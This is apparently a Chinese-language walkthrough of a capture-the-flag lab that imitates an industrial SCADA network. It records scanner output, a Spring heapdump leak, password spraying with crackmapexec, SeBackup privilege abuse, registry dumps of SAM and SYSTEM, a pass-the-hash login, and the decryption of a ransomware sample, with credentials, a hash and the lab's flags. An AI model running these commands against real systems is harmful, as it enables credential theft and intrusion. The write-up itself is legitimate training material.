ThermalPower
涉及的知识点
heapdump泄露利用
密码喷洒
SeBackup/SeRestore特权利用
ftp匿名登录
exe程序反编译
勒索文件解密flag1
fscan扫到经典heapdump泄露
start infoscan
39.98.119.163:8080 open
39.98.119.163:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.98.119.163:8080 code:302 len:0 title:None 跳转url: http://39.98.119.163:8080/login;jsessionid=901605FC80F2608E8765E64411E1F3A8
[*] WebTitle http://39.98.119.163:8080/login;jsessionid=901605FC80F2608E8765E64411E1F3A8 code:200 len:2936 title:火创
能源监控画面管理平台
[+] PocScan http://39.98.119.163:8080 poc-yaml-spring-actuator-heapdump-file
[+] PocScan http://39.98.119.163:8080 poc-yaml-springboot-env-unauth spring2访问下载http://39.98.119.163:8080/actuator/heapdump,找到ShiroKey
QZYysgMYhG6/CzIJlVpR2g==发现是root权限,直接vshell上线
拿到第一个flag
flag{413dcb5c-d975-48c1-83cd-4afe8efd0145}flag2
传fscan跟gost继续扫
start infoscan
(icmp) Target 172.22.17.6 is alive
(icmp) Target 172.22.17.213 is alive
[*] Icmp alive hosts len is: 2
172.22.17.213:22 open
172.22.17.213:8080 open
172.22.17.6:80 open
172.22.17.6:445 open
172.22.17.6:139 open
172.22.17.6:135 open
172.22.17.6:21 open
[*] alive ports len is: 7
start vulscan
[*] WebTitle http://172.22.17.213:8080 code:302 len:0 title:None 跳转url: http://172.22.17.213:8080/login;jsessionid=3FB0F1211EA6724CDAD95E12E76BE6CE
[*] NetBios 172.22.17.6 WORKGROUP\WIN-ENGINEER
[*] NetInfo
[*]172.22.17.6
[->]WIN-ENGINEER
[->]172.22.17.6
[+] ftp 172.22.17.6:21:anonymous
[->]Modbus
[->]PLC
[->]web.config
[->]WinCC
[->]内部软件
[->]火创能源内部资料
[*] WebTitle http://172.22.17.213:8080/login;jsessionid=3FB0F1211EA6724CDAD95E12E76BE6CE code:200 len:2936 title:火创能源监控画面管理平台
[*] WebTitle http://172.22.17.6 code:200 len:661 title:172.22.17.6 - /
[+] PocScan http://172.22.17.213:8080 poc-yaml-spring-actuator-heapdump-file
[+] PocScan http://172.22.17.213:8080 poc-yaml-springboot-env-unauth spring2发现ftp服务能匿名访问
ftp://172.22.17.6
得到初始密码格式
筛选职位为SCADA工程师,并且将账号工号组合成密码字典
对172.22.17.6进行密码喷洒,发现chenhua用户能够登录(其实都能登,只是爆破到成功的就会停止)
proxychains4 crackmapexec smb 172.22.17.6 -u user.txt -p pass.txt 2>/dev/null
// 可以添加 --no-bruteforce 参数:No spray when using file for username and password (user1 => password1, user2 => password2
chenhua/chenhua@0813登录查看用户特权,发现确实是在Backup Operators组里,但是特权没有显示SeBackup和SeRestorePrivilege
evil-winrm连不上,nmap看了下5985端口是关闭的,用SeBackupPrivilege工具和EnableSeBackupPrivilege工具也开启不了,还想着用多种方式打一下,比如
SeRestorePrivilege打粘连键或辅助功能提权
SeRestorePrivilege一键工具利用
SeBackupPrivilege和SeRestorePrivilege打卷影拷贝 or 直接拷贝,拷贝flag或者拷贝sam跟system本地拿hash后面chu0说后面靶场环境改了,出了点问题打不了,先记录命令
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
Get-SeBackupPrivilege
Copy-FileSeBackupPrivilege C:\Users\Administrator\flag\flag02.txt C:\Users\chenhua\Desktop\flag02.txt -Overwritecd c:\
mkdir Temp
cd Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
reg save c:\Users\Administrator\flag\flag02.txt c:\Temp\flag.txt
download sam
download system然后因为管理员hash是固定的,直接挪用其他师傅的逃课
proxychains4 crackmapexec smb 172.22.17.6 -u administrator -Hf82292b7ac79b05d5b0e3d302bd0d279 
flag{2deae764-d9e4-435f-b660-535e1416963c}flag3
前面ftp服务里的SCADA.txt还记录了WIN-SCADA主机账密
Administrator/IYnT3GyCiy3fscan继续扫一下26网段,登录172.22.26.11
start infoscan
(icmp) Target 172.22.26.11 is alive
[*] Icmp alive hosts len is: 1
172.22.26.11:1433 open
172.22.26.11:445 open
172.22.26.11:135 open
172.22.26.11:139 open
172.22.26.11:80 open
[*] alive ports len is: 5
start vulscan
[*] NetBios 172.22.26.11 WORKGROUP\WIN-SCADA
[+] mssql 172.22.26.11:1433:sa 123456
[*] NetInfo
[*]172.22.26.11
[->]WIN-SCADA
[->]172.22.26.11
[*] WebTitle http://172.22.26.11 code:200 len:703 title:IIS Windows Server
已完成 5/5
[*] 扫描结束,耗时: 4.820145107s登录过一会就会自启动自动化控制系统,点锅炉开就会出现 flag
flag4
登录完没一会壁纸就被替换成勒索信息,将桌面的ScadaDB.sql.locky文件和c盘下的Lockyou.exe复制到本地,用dnSpy对exe进行反编译
首先看文件加密逻辑,对ScadaDB.sql文件进行aes加密,然后将初始化向量写到加密文件最前面,之后将文件加密后的内容copy到向量后面
初始化向量就是ScadaDB.sql.locky文件前16位,现在还需要获取AES_KEY,接着看AESCrypto类,是将encryptedAesKey作为密文,privateKey作为私钥进行RSA解密得到AES_KEY,其中密文和私钥已经给出,但是私钥给的是XML格式,自己解的话就得在网站上转成pem格式
拿到AES_KEY后,将文件前16位作为IV,后面的密文放到厨子进行aes解密,得到最后一个flag
flag{63cd8cd5-151f-4f29-bdc7-f80312888158}